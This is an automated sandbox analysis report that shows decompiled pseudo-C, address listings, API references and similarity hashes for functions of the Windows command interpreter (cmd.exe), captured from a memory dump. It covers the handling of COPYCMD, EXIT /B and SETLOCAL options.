					if( *_t254 == 0) {
						_t177 = _v28;
						__eflags = _t177;
						if(_t177 == 0) {
							_t177 =  &_v548;
						}
						 *_t177 =  *((intOrPtr*)( *0x1f3cec));
						_t112 = _v28;
						__eflags = _t112;
						if(_t112 == 0) {
							_t112 =  &_v548;
						}
						_t178 = 0x3a;
						 *((short*)(_t112 + 2)) = _t178;
						_t113 = _v28;
						__eflags = _t113;
						if(_t113 == 0) {
							_t113 =  &_v548;
						}
						 *((short*)(_t113 + 4)) = 0;
						L19:
						_t238 = _a8;
						_t217 = _a8;
						_t255 = _v552;
						if(E001C2D22(_v552, _t238, _t162) != 0) {
							goto L49;
						}
						_t163 = _v560;
						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
							_t222 = 0x5c;
							_t258 = E001C2349(_t255, _t222);
							if(_t258 == 0) {
								_t259 = _v552;
							} else {
								_t259 = _t258 + 2;
							}
							_t223 = 0x5c;
							if(E001C2349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
							}
							E001C1040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
						}
						_t117 = _v28;
						if(_v28 == 0) {
							_t117 =  &_v548;
						}
						_t162 = _v564;
						_t217 = _a16;
						_t118 = E001C2D22(_t162, _a16, _t117);
						if(_t118 != 0) {
							goto L49;
						} else {
							_t256 = _t118;
							 *0x1f3cf0 = _t118;
							SetLastError(_t118);
							_t239 = _v568;
							_t182 = _t162;
							 *_t239 = 0;
							_t120 =  *_t162 & 0x0000ffff;
							_t217 = _t120;
							if(_t120 == 0) {
								L32:
								_t121 = 0x5c;
								if(_t217 == _t121) {
									_t183 = _t162;
									_t256 = 1;
									__eflags = 1;
									_t217 =  &(_t183[1]);
									do {
										_t122 =  *_t183;
										_t183 =  &(_t183[1]);
										__eflags = _t122 - _v556;
									} while (_t122 != _v556);
									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
								}
								_t124 = GetFileAttributesW(_t162);
								if(_t124 != 0xffffffff) {
									__eflags = _t124 & 0x00000010;
									if((_t124 & 0x00000010) != 0) {
										 *_t239 = 1;
										_t256 = 1;
									}
									L36:
									if(_t256 != 0) {
										_t125 = 0x5c;
										_t126 = E001C2349(_v552, _t125);
										_t256 = _t126;
										__eflags = 0;
										_t219 = _t126;
										_t49 = _t219 + 2; // 0x2
										_t127 = _t49;
										do {
											_t187 =  *_t219;
											_t219 = _t219 + 2;
											__eflags = _t187;
										} while (_t187 != 0);
										_t188 = _t162;
										_t220 = _t219 - _t127;
										__eflags = _t220;
										_t217 = _t220 >> 1;
										_t241 =  &(_t188[1]);
										do {
											_t128 =  *_t188;
											_t188 =  &(_t188[1]);
											__eflags = _t128 - _v556;
										} while (_t128 != _v556);
										_t52 = _t217 + 1; // -1
										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
										if(__eflags > 0) {
											goto L49;
										}
										_t217 = _a16;
										E001C18C0(_t162, _a16, _t256);
									}
									__imp__??_V@YAXPAX@Z(_v28);
									_pop(_t242);
									return E001C6FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
								}
								_t136 = GetLastError();
								 *0x1f3cf0 = _t136;
								if(_t136 == 0 || _t136 == 2) {
									goto L36;
								} else {
									__eflags = _t136 - 3;
									if(__eflags == 0) {
										goto L36;
									}
									_t170 = _t136;
									goto L48;
								}
							}
							do {
								_t137 = _t182;
								_t182 =  &(_t182[1]);
							} while ( *_t182 != 0);
							_t217 =  *_t137 & 0x0000ffff;
							goto L32;
						}
					}
					_t199 = _t254;
					if( *((intOrPtr*)(E001BD7E6(_t199))) != 0) {
						goto L46;
					}
					_t217 =  &(_t199[1]);
					do {
						_t146 =  *_t199;
						_t199 =  &(_t199[1]);
					} while (_t146 != 0);
					if(_t199 - _t217 >> 1 > 0x7fe7) {
						goto L49;
					}
					_t244 = _t254;
					_t27 =  &(_t244[1]); // -1
					_t202 = _t27;
					do {
						_t147 =  *_t244;
						_t244 =  &(_t244[1]);
					} while (_t147 != 0);
					_t246 = _t244 - _t202 >> 1;
					_t148 = E001C22C0(_t162, _t254);
					_t28 = _t246 + 1; // -4
					E001C1040(_t254, _t28, _t148);
					_t150 = _t254[1] & 0x0000ffff;
					_t227 = 0x3a;
					if(_t150 != _t227) {
						_t205 = 0x5c;
						__eflags =  *_t254 - _t205;
						if( *_t254 != _t205) {
							L61:
							_t206 = _v28;
							__eflags = _t206;
							if(_t206 == 0) {
								_t206 =  &_v548;
							}
							 *_t206 =  *((intOrPtr*)( *0x1f3cec));
							_t153 = _v28;
							__eflags = _t153;
							if(_t153 == 0) {
								_t153 =  &_v548;
							}
							 *((short*)(_t153 + 2)) = _t227;
							_t154 = _v28;
							__eflags = _t154;
							if(_t154 == 0) {
								_t154 =  &_v548;
							}
							 *((short*)(_t154 + 4)) = 0;
							_t208 = _v28;
							__eflags = _t208;
							if(_t208 == 0) {
								_t208 =  &_v548;
							}
							_t228 = _t208 + 2;
							__eflags = 0;
							do {
								_t155 =  *_t208;
								_t208 = _t208 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							_t209 = _t208 - _t228;
							__eflags = _t209;
							_t229 = _t254;
							_t210 = _t209 >> 1;
							_t73 =  &(_t229[1]); // 0x1
							_t248 = _t73;
							do {
								_t156 =  *_t229;
								_t229 =  &(_t229[1]);
								__eflags = _t156 - _v556;
							} while (_t156 != _v556);
							_t217 = _t229 - _t248 >> 1;
							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
							if(__eflags > 0) {
								goto L49;
							}
							E001C0CF2(_t217, _t254);
							goto L19;
						}
						__eflags = _t150 - _t205;
						if(_t150 == _t205) {
							goto L18;
						}
						goto L61;
					}
					L18:
					E001C0D89(_t227, _t254);
					goto L19;
				} else {
					goto L1;
				}
				do {
					L1:
					_t161 =  *_t162 & 0x0000ffff;
					_t162 =  &(_t162[1]);
				} while (_t161 != 0);
				goto L2;
			}

0x001c5fd3
0x001c5fda
0x001c5fe0
0x001c5fea
0x001c5ff6
0x001c6005
0x001c6007
0x001c6016
0x001c6023
0x001c602e
0x001c603b
0x001c6048
0x001c6048
0x001c604a
0x001c604c
0x001c604c
0x001c604f
0x001c604f
0x001c6052
0x001c6055
0x001c605a
0x001c605c
0x001c605e
0x001cf576
0x001cf576
0x001cf57f
0x001cf57f
0x001cf584
0x001cf584
0x00000000
0x001cf584
0x001c606a
0x00000000
0x00000000
0x001c6070
0x001c6072
0x001c6072
0x001c6075
0x001c6075
0x001c6078
0x001c607b
0x001c6084
0x001c6086
0x001c608c
0x001c608c
0x001c6091
0x001c6098
0x001c60a3
0x001c60a8
0x001cf58b
0x00000000
0x001cf58b
0x001c60b0
0x001c60b9
0x001c60c4
0x001c60c8
0x001c60ee
0x001cf593
0x00000000
0x001cf593
0x001c60f7
0x001c60fd
0x001cf59a
0x001cf59d
0x001cf59f
0x001cf5a1
0x001cf5a1
0x001cf5af
0x001cf5b2
0x001cf5b5
0x001cf5b7
0x001cf5b9
0x001cf5b9
0x001cf5c1
0x001cf5c2
0x001cf5c6
0x001cf5c9
0x001cf5cb
0x001cf5cd
0x001cf5cd
0x001cf5d5
0x001c6175
0x001c6175
0x001c6178
0x001c617a
0x001c618a
0x00000000
0x00000000
0x001c6190
0x001c619e
0x001c61a2
0x001c61aa
0x001c61ae
0x001cf685
0x001c61b4
0x001c61b4
0x001c61b4
0x001c61bb
0x001c61c6
0x001c61ca
0x001c61ca
0x001c61de
0x001c61de
0x001c61e3
0x001c61e8
0x001cf690
0x001cf690
0x001c61ee
0x001c61f6
0x001c61fa
0x001c6201
0x00000000
0x001c6207
0x001c6208
0x001c620a
0x001c620f
0x001c6215
0x001c621d
0x001c621f
0x001c6221
0x001c6224
0x001c6229
0x001c623a
0x001c623c
0x001c6240
0x001cf69b
0x001cf69f
0x001cf69f
0x001cf6a0
0x001cf6a3
0x001cf6a3
0x001cf6a6
0x001cf6a9
0x001cf6a9
0x001cf6b8
0x001cf6b8
0x001c6247
0x001c6250
0x001c628d
0x001c628f
0x001c6294
0x001c6296
0x001c6296
0x001c626a
0x001c626c
0x001c62a2
0x001c62a5
0x001c62aa
0x001c62ac
0x001c62ae
0x001c62b0
0x001c62b0
0x001c62b3
0x001c62b3
0x001c62b6
0x001c62b9
0x001c62b9
0x001c62be
0x001c62c0
0x001c62c0
0x001c62c2
0x001c62c4
0x001c62c7
0x001c62c7
0x001c62ca
0x001c62cd
0x001c62cd
0x001c62d8
0x001c62df
0x001c62e4
0x00000000
0x00000000
0x001c62ea
0x001c62f0
0x001c62f0
0x001c6271
0x001c627d
0x001c628a
0x001c628a
0x001c6252
0x001c6258
0x001c625f
0x00000000
0x001cf6c2
0x001cf6c2
0x001cf6c5
0x00000000
0x00000000
0x001cf57d
0x00000000
0x001cf57d
0x001c625f
0x001c622d
0x001c622d
0x001c622f
0x001c6232
0x001c6237
0x00000000
0x001c6237
0x001c6201
0x001c6103
0x001c610d
0x00000000
0x00000000
0x001c6113
0x001c6116
0x001c6116
0x001c6119
0x001c611c
0x001c612b
0x00000000
0x00000000
0x001c6131
0x001c6135
0x001c6135
0x001c6138
0x001c6138
0x001c613b
0x001c613e
0x001c6147
0x001c6149
0x001c614f
0x001c6154
0x001c6159
0x001c615f
0x001c6163
0x001cf5e0
0x001cf5e1
0x001cf5e4
0x001cf5ef
0x001cf5ef
0x001cf5f2
0x001cf5f4
0x001cf5f6
0x001cf5f6
0x001cf604
0x001cf607
0x001cf60a
0x001cf60c
0x001cf60e
0x001cf60e
0x001cf614
0x001cf618
0x001cf61b
0x001cf61d
0x001cf61f
0x001cf61f
0x001cf627
0x001cf62b
0x001cf62e
0x001cf630
0x001cf632
0x001cf632
0x001cf638
0x001cf63b
0x001cf63d
0x001cf63d
0x001cf640
0x001cf643
0x001cf643
0x001cf648
0x001cf648
0x001cf64a
0x001cf64c
0x001cf64e
0x001cf64e
0x001cf651
0x001cf651
0x001cf654
0x001cf657
0x001cf657
0x001cf665
0x001cf669
0x001cf66e
0x00000000
0x00000000
0x001cf67b
0x00000000
0x001cf67b
0x001cf5e6
0x001cf5e9
0x00000000
0x00000000
0x00000000
0x001cf5e9
0x001c6169
0x001c6170
0x00000000
0x00000000
0x00000000
0x00000000
0x001c603d
0x001c603d
0x001c603d
0x001c6040
0x001c6043
0x00000000

APIs

Part of subcall function 001C3320: _wcsnicmp.MSVCRT ref: 001C33A4

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

Part of subcall function 001C62FA: _wcsnicmp.MSVCRT ref: 001C6367
Part of subcall function 001C62FA: _wcsnicmp.MSVCRT ref: 001CF6F6

memset.MSVCRT ref: 001C60C8
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 001C620F
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001C6247
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001C6252
??_V@YAXPAX@Z.MSVCRT ref: 001C6271

Strings

COPYCMD, xrefs: 001C5FFF

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
String ID: COPYCMD
API String ID: 1068965577-3727491224
Opcode ID: fce896bf8aefbefac7c4912dc87c967d9f6b977019a68ca6bd9a4400f9fc46b9
Instruction ID: 139498649adeb814a893e25452e3e82aa6454de17ffdc4ba77e502422bb8256b
Opcode Fuzzy Hash: fce896bf8aefbefac7c4912dc87c967d9f6b977019a68ca6bd9a4400f9fc46b9
Instruction Fuzzy Hash: C6D1C635A001159BCB28DF68D895FBAB3B6EFB8300F15456DE906D7295EB34DE42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 001B5E70 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292
COMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E001B5E70(void* __ecx, signed int* _a4) {
				signed int _v8;
				short _v24;
				short _v26;
				short _v28;
				signed short _v29;
				signed int _v36;
				signed int _v40;
				signed short* _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t100;
				intOrPtr _t104;
				signed int _t107;
				short* _t117;
				signed int _t118;
				signed short* _t120;
				signed short _t122;
				signed int _t124;
				signed int _t129;
				signed int _t132;
				signed short _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				short _t148;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				void* _t163;
				signed short _t165;
				signed short _t170;
				void* _t173;
				signed int _t174;
				signed int _t177;
				intOrPtr _t178;
				void* _t189;
				signed short* _t200;
				signed int _t204;
				void* _t205;
				void* _t206;
				signed int* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				wchar_t* _t219;
				int _t220;
				void* _t221;
				signed int _t223;
				signed int* _t225;
				signed int _t230;
				signed int _t234;

				_t230 = _t234;
				_push(__ecx);
				_push(__ecx);
				_t212 = _a4;
				_t162 = 0;
				_t219 = _t212[0xf];
				if(_t219 == 0) {
					L15:
					if( *_t212 != 0x14) {
						goto L65;
					} else {
						goto L16;
					}
				} else {
					_t205 = 0x20;
					while(1) {
						_t80 =  *_t219 & 0x0000ffff;
						if(_t80 == 0 || _t80 > _t205) {
							break;
						}
						_t219 =  &(_t219[0]);
						__eflags = _t219;
						if(_t219 != 0) {
							continue;
						} else {
						}
						break;
					}
					if(_t219 == 0) {
						goto L15;
					} else {
						__imp___wcsnicmp(_t219, L"/B", 2);
						_t234 = _t234 + 0xc;
						if(_t80 != 0) {
							L11:
							if(_t219 != 0) {
								_t80 = swscanf(_t219, L"%d",  &_v8);
								_t234 = _t234 + 0xc;
								if(_t80 == 1) {
									_t80 = _v8;
									 *0x1eb8b0 = _t80;
									if( *0x1f3ccc != _t162) {
										_t162 = _t80;
									}
								}
							}
							goto L15;
						} else {
							 *_t212 = 0x14;
							_t212[0xf] = L":EOF";
							_t219 =  &(_t219[1]);
							if(_t219 == 0) {
								L16:
								if( *0x1f3cc4 == 0) {
									L65:
									_t170 =  *0x1e3874;
									E001BC7F7(_t80, _t170);
									_t220 =  *0x1eb8b0;
									do {
										__eflags = E001C4B60(__eflags, 0);
									} while (__eflags == 0);
									exit(_t220);
									asm("int3");
									_t83 =  *(_t162 + 0xc);
									__eflags = _t83;
									if(_t83 != 0) {
										do {
											_t216 = _t83;
											_v40 = _t216;
											_t83 =  *(_t216 + 0xc);
											__eflags = _t83;
										} while (_t83 != 0);
										_t212 = _v36;
										_t162 = _v40;
									}
									_t84 =  *_t220 & 0x0000ffff;
									__eflags = _t84;
									if(_t84 == 0) {
										L38:
										_t85 = 0;
										__eflags = 0;
										goto L39;
									} else {
										while(1) {
											_t207 = 0x2f;
											_v29 = _t170;
											__eflags = _t84 - _t207;
											if(_t84 != _t207) {
												goto L36;
											}
											_t7 = _t220 + 4; // 0x4
											_t117 = _t7;
											_t165 = _t170;
											__eflags =  *_t117 - 0x2d;
											_v52 = _t117;
											if( *_t117 == 0x2d) {
												_v29 = 1;
												_t165 = 1;
											}
											_t118 = _t165 & 0x0000ffff;
											_v36 = _t118;
											_t120 = _t220 + (_t118 + 2) * 2;
											_v44 = _t120;
											_t122 = towupper( *_t120 & 0x0000ffff);
											_pop(_t196);
											_t124 = (_t122 & 0x0000ffff) - 0x3f;
											__eflags = _t124;
											if(__eflags == 0) {
												E001D9373(_t207, __eflags);
												__eflags = 0;
												_push(0);
												_push(0x2381);
												E001BC108(_t196);
												 *0x1f8065 = 0;
												 *0x1f851c = 0;
												goto L93;
											} else {
												_t129 = _t124;
												__eflags = _t129;
												if(_t129 == 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														_t207 = _t212;
														_t132 = E001D9CFA(_t220 + (_v36 + 3) * 2, _t212);
														__eflags = _t132;
														if(_t132 != 0) {
															goto L93;
														} else {
															__eflags = _t212[2] & 0x00000001;
															if((_t212[2] & 0x00000001) != 0) {
																 *_t212 =  *_t212 | 0x00001000;
															}
															goto L33;
														}
													} else {
														_t200 = _v44;
														_t207 =  &(_t200[1]);
														do {
															_t133 =  *_t200;
															_t200 =  &(_t200[1]);
															__eflags = _t133 - _v48;
														} while (_t133 != _v48);
														_t196 = _t200 - _t207 >> 1;
														__eflags = _t200 - _t207 >> 1 - 1;
														if(_t200 - _t207 >> 1 > 1) {
															goto L89;
														} else {
															_t212[1] = 6;
															_t212[2] = 0;
															goto L33;
														}
													}
												} else {
													_t139 = _t129 - 5;
													__eflags = _t139;
													if(_t139 == 0) {
														__eflags = _v29;
														_t140 =  *_t212;
														if(_v29 != 0) {
															_t141 = _t140 ^ 0x00001000;
														} else {
															_t141 = _t140 | 0x00001000;
															__eflags = _t141;
														}
														goto L32;
													} else {
														_t143 = _t139 - 0xa;
														__eflags = _t143;
														if(_t143 == 0) {
															__eflags = _v29;
															_t144 =  *_t212;
															if(_v29 == 0) {
																_t141 = _t144 | 0x00000800;
															} else {
																_t141 = _t144 ^ 0x00000800;
															}
															goto L32;
														} else {
															_t145 = _t143 - 1;
															__eflags = _t145;
															if(_t145 != 0) {
																__eflags = _t145 != 0;
																if(_t145 != 0) {
																	_t148 = 0x2f;
																	_v28 = _t148;
																	_v26 =  *((intOrPtr*)(_t220 + 4));
																	_v24 = 0;
																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
																	_push(1);
																	_push(0x2375);
																	goto L91;
																} else {
																	__eflags = _v29;
																	_t154 =  *_t212;
																	if(_v29 != 0) {
																		_t155 = _t154 ^ 0x00000010;
																	} else {
																		_t155 = _t154 | 0x00000010;
																		__eflags = _t155;
																	}
																	 *_t212 = _t155;
																	_t156 = _v36;
																	__eflags =  *(_t220 + 6 + _t156 * 2);
																	if( *(_t220 + 6 + _t156 * 2) == 0) {
																		goto L33;
																	} else {
																		_t204 = (_t165 & 0x0000ffff) + 2;
																		_t196 = _t220 + _t204 * 2;
																		_push(_t220 + _t204 * 2);
																		goto L90;
																	}
																}
															} else {
																__eflags = _v29;
																_t157 =  *_t212;
																if(_v29 != 0) {
																	_t141 = _t157 ^ 0x00002000;
																} else {
																	_t141 = _t157 | 0x00002000;
																}
																L32:
																 *_t212 = _t141;
																_t196 = 0;
																_t142 = _v36;
																__eflags =  *(_t220 + 6 + _t142 * 2);
																if( *(_t220 + 6 + _t142 * 2) != 0) {
																	L89:
																	_t135 = (_t165 & 0x0000ffff) + 2;
																	__eflags = _t135;
																	_push(_t220 + _t135 * 2);
																	L90:
																	_push(1);
																	_push(0x2376);
																	L91:
																	E001BC5A2(_t196);
																	L93:
																	_t85 = 1;
																	L39:
																	_pop(_t213);
																	_pop(_t221);
																	__eflags = _v8 ^ _t230;
																	_pop(_t163);
																	return E001C6FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
																} else {
																	L33:
																	_t220 = _v52;
																	_t162 = _v40;
																	L34:
																	_t220 = E001BD7E6(_t220);
																	_t84 =  *_t220 & 0x0000ffff;
																	__eflags = _t84;
																	if(_t84 == 0) {
																		goto L38;
																	} else {
																		_t170 = 0;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
											goto L102;
											L36:
											_t87 = _t212[0x12];
											__eflags = _t87;
											if(_t87 != 0) {
												_t173 = 0x10;
												_t88 = E001C00B0(_t173);
												__eflags = _t88;
												if(_t88 == 0) {
													E001D9287(_t173);
													__imp__longjmp(0x1eb8b8, 1);
													asm("int3");
													_t174 = 0x1f3ab0;
													__eflags = 0;
													do {
														_t90 =  *_t174;
														_t174 = _t174 + 2;
														__eflags = _t90;
													} while (_t90 != 0);
													_t214 = (_t174 - 0x1f3ab2 >> 1) + 1;
													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
													__eflags = _t223;
													if(_t223 == 0) {
														L96:
														_t94 = 1;
													} else {
														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
														 *_t223 = _t177;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L96;
														} else {
															_t98 =  *0x1f3cb8;
															__eflags = _t98;
															if(_t98 == 0) {
																_t98 = 0x1f3ab0;
															}
															E001C1040(_t177, _t214, _t98);
															_t100 = E001C3B2C(_t177);
															 *(_t223 + 4) = _t100;
															__eflags = _t100;
															if(_t100 == 0) {
																goto L96;
															} else {
																_t178 =  *0x1f3cc4;
																 *((char*)(_t223 + 8)) =  *0x1f3cc9;
																 *((char*)(_t223 + 9)) =  *0x1f3cc8;
																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
																_t104 =  *0x1f3cd8;
																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
																}
																_t225 = E001BEA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
																_t107 = 0;
																 *0x1eb8b0 = 0;
																while(1) {
																	__eflags =  *_t225 - _t107;
																	if( *_t225 == _t107) {
																		break;
																	}
																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
																	__eflags = _t107;
																	if(_t107 != 0) {
																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
																		__eflags = _t107;
																		if(_t107 == 0) {
																			 *0x1f3cc9 = 0;
																			goto L58;
																		} else {
																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
																			__eflags = _t107;
																			if(_t107 != 0) {
																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
																				_t189 = _t225;
																				__eflags = _t107;
																				if(_t107 != 0) {
																					__eflags =  *_t225;
																					if( *_t225 == 0) {
																						goto L58;
																					} else {
																						_push(0);
																						_push(0x400023a6);
																						E001BC5A2(_t189);
																						_t94 = 1;
																						 *0x1eb8b0 = 1;
																					}
																				} else {
																					 *0x1f3cc8 = _t107;
																					goto L58;
																				}
																			} else {
																				 *0x1f3cc8 = 1;
																				goto L58;
																			}
																		}
																	} else {
																		 *0x1f3cc9 = 1;
																		L58:
																		_t225 = E001BD7E6(_t225);
																		_t107 = 0;
																		__eflags = 0;
																		continue;
																	}
																	goto L63;
																}
																_t94 = 0;
																__eflags = 0;
															}
														}
													}
													L63:
													return _t94;
												} else {
													 *(_t162 + 0xc) = _t88;
													_t162 = _t88;
													 *((intOrPtr*)(_t88 + 0xc)) = 0;
													_t87 = _t212[0x12];
													_v40 = _t162;
													goto L37;
												}
											} else {
												L37:
												_t212[0x12] = _t87 + 1;
												 *_t162 = E001C297B(E001C22C0(_t162, _t220));
												 *((char*)(_t162 + 8)) = 1;
												goto L34;
											}
											goto L102;
										}
									}
								} else {
									E001B6980(_t212);
									return _t162;
								}
							} else {
								_t206 = 0x20;
								while(1) {
									_t80 =  *_t219 & 0x0000ffff;
									if(_t80 == 0 || _t80 > _t206) {
										goto L11;
									}
									_t219 =  &(_t219[0]);
									if(_t219 != 0) {
										continue;
									}
									goto L11;
								}
								goto L11;
							}
						}
					}
				}
				L102:
			}

0x001b5e73
0x001b5e75
0x001b5e76
0x001b5e7a
0x001b5e7d
0x001b5e7f
0x001b5e84
0x001b5f0d
0x001b5f10
0x00000000
0x00000000
0x00000000
0x00000000
0x001b5e8a
0x001b5e8c
0x001b5e8d
0x001b5e8d
0x001b5e93
0x00000000
0x00000000
0x001b5f35
0x001b5f35
0x001b5f38
0x00000000
0x00000000
0x001b5f3e
0x00000000
0x001b5f38
0x001b5ea0
0x00000000
0x001b5ea2
0x001b5eaa
0x001b5eb0
0x001b5eb5
0x001b5edf
0x001b5ee1
0x001b5eed
0x001b5ef3
0x001b5ef9
0x001b5efb
0x001b5efe
0x001b5f09
0x001b5f0b
0x001b5f0b
0x001b5f09
0x001b5ef9
0x00000000
0x001b5eb7
0x001b5eb7
0x001b5ebd
0x001b5ec4
0x001b5ec7
0x001b5f16
0x001b5f1d
0x001ca76e
0x001ca76e
0x001ca774
0x001ca779
0x001ca77f
0x001ca786
0x001ca786
0x001ca78b
0x001ca791
0x001ca792
0x001ca795
0x001ca797
0x001ca79d
0x001ca79d
0x001ca79f
0x001ca7a2
0x001ca7a5
0x001ca7a5
0x001ca7a9
0x001ca7ac
0x001ca7ac
0x001bc2db
0x001bc2de
0x001bc2e1
0x001bc3c8
0x001bc3c8
0x001bc3c8
0x00000000
0x00000000
0x001bc2e7
0x001bc2e9
0x001bc2ea
0x001bc2ed
0x001bc2f0
0x00000000
0x00000000
0x001bc2f6
0x001bc2f6
0x001bc2f9
0x001bc2fb
0x001bc2ff
0x001bc302
0x001ca7b6
0x001ca7ba
0x001ca7ba
0x001bc308
0x001bc30b
0x001bc311
0x001bc314
0x001bc31b
0x001bc324
0x001bc325
0x001bc325
0x001bc328
0x001ca8c7
0x001ca8cc
0x001ca8ce
0x001ca8cf
0x001ca8d4
0x001ca8db
0x001ca8e1
0x00000000
0x001bc32e
0x001bc32f
0x001bc32f
0x001bc332
0x001ca7f0
0x001ca7f4
0x001ca829
0x001ca831
0x001ca836
0x001ca838
0x00000000
0x001ca83e
0x001ca83e
0x001ca842
0x001ca848
0x001ca848
0x00000000
0x001ca842
0x001ca7f6
0x001ca7f6
0x001ca7f9
0x001ca7fc
0x001ca7fc
0x001ca7ff
0x001ca802
0x001ca802
0x001ca80a
0x001ca80c
0x001ca80f
0x00000000
0x001ca815
0x001ca817
0x001ca81e
0x00000000
0x001ca81e
0x001ca80f
0x001bc338
0x001bc338
0x001bc338
0x001bc33b
0x001bc362
0x001bc366
0x001bc368
0x001ca7e6
0x001bc36e
0x001bc36e
0x001bc36e
0x001bc36e
0x00000000
0x001bc33d
0x001bc33d
0x001bc33d
0x001bc340
0x001ca7ca
0x001ca7ce
0x001ca7d0
0x001ca7dc
0x001ca7d2
0x001ca7d2
0x001ca7d2
0x00000000
0x001bc346
0x001bc346
0x001bc346
0x001bc349
0x001bc3dc
0x001bc3df
0x001ca886
0x001ca887
0x001ca88f
0x001ca895
0x001ca8a2
0x001ca8a3
0x001ca8a5
0x00000000
0x001bc3e5
0x001bc3e5
0x001bc3e9
0x001bc3eb
0x001bc403
0x001bc3ed
0x001bc3ed
0x001bc3ed
0x001bc3ed
0x001bc3f0
0x001bc3f4
0x001bc3f7
0x001bc3fc
0x00000000
0x001bc3fe
0x001ca87b
0x001ca87e
0x001ca881
0x00000000
0x001ca881
0x001bc3fc
0x001bc34f
0x001bc34f
0x001bc353
0x001bc355
0x001ca7c0
0x001bc35b
0x001bc35b
0x001bc35b
0x001bc373
0x001bc373
0x001bc375
0x001bc377
0x001bc37a
0x001bc37f
0x001ca8ac
0x001ca8af
0x001ca8af
0x001ca8b5
0x001ca8b6
0x001ca8b6
0x001ca8b8
0x001ca8bd
0x001ca8bd
0x001ca8e7
0x001ca8e9
0x001bc3ca
0x001bc3cd
0x001bc3ce
0x001bc3cf
0x001bc3d1
0x001bc3da
0x001bc385
0x001bc385
0x001bc385
0x001bc388
0x001bc38b
0x001bc392
0x001bc394
0x001bc397
0x001bc39a
0x00000000
0x001bc39c
0x001bc39c
0x00000000
0x001bc39c
0x001bc39a
0x001bc37f
0x001bc349
0x001bc340
0x001bc33b
0x001bc332
0x00000000
0x001bc3a3
0x001bc3a3
0x001bc3a6
0x001bc3a8
0x001ca855
0x001ca856
0x001ca85b
0x001ca85d
0x001ca8ef
0x001ca8fb
0x001ca901
0x001ca902
0x001bc471
0x001bc473
0x001bc473
0x001bc476
0x001bc479
0x001bc479
0x001bc486
0x001bc496
0x001bc498
0x001bc49a
0x001ca91a
0x001ca91c
0x001bc4a0
0x001bc4b3
0x001bc4b5
0x001bc4b7
0x001bc4b9
0x00000000
0x001bc4bf
0x001bc4bf
0x001bc4c4
0x001bc4c6
0x001ca922
0x001ca922
0x001bc4cf
0x001bc4d4
0x001bc4d9
0x001bc4dc
0x001bc4de
0x00000000
0x001bc4e4
0x001bc4e4
0x001bc4ef
0x001bc4f7
0x001bc4fd
0x001bc504
0x001bc509
0x001bc50c
0x001bc50f
0x001bc512
0x001bc514
0x001bc514
0x001bc527
0x001bc529
0x001bc52b
0x001bc56c
0x001bc56c
0x001bc56f
0x00000000
0x00000000
0x001bc577
0x001bc57f
0x001bc581
0x001bc538
0x001bc540
0x001bc542
0x001bc59b
0x00000000
0x001bc544
0x001bc54a
0x001bc552
0x001bc554
0x001ca932
0x001ca939
0x001ca93a
0x001ca93c
0x001ca94a
0x001ca94d
0x00000000
0x001ca953
0x001ca953
0x001ca954
0x001ca959
0x001ca961
0x001ca963
0x001ca963
0x001ca93e
0x001ca93e
0x00000000
0x001ca93e
0x001bc55a
0x001bc55a
0x00000000
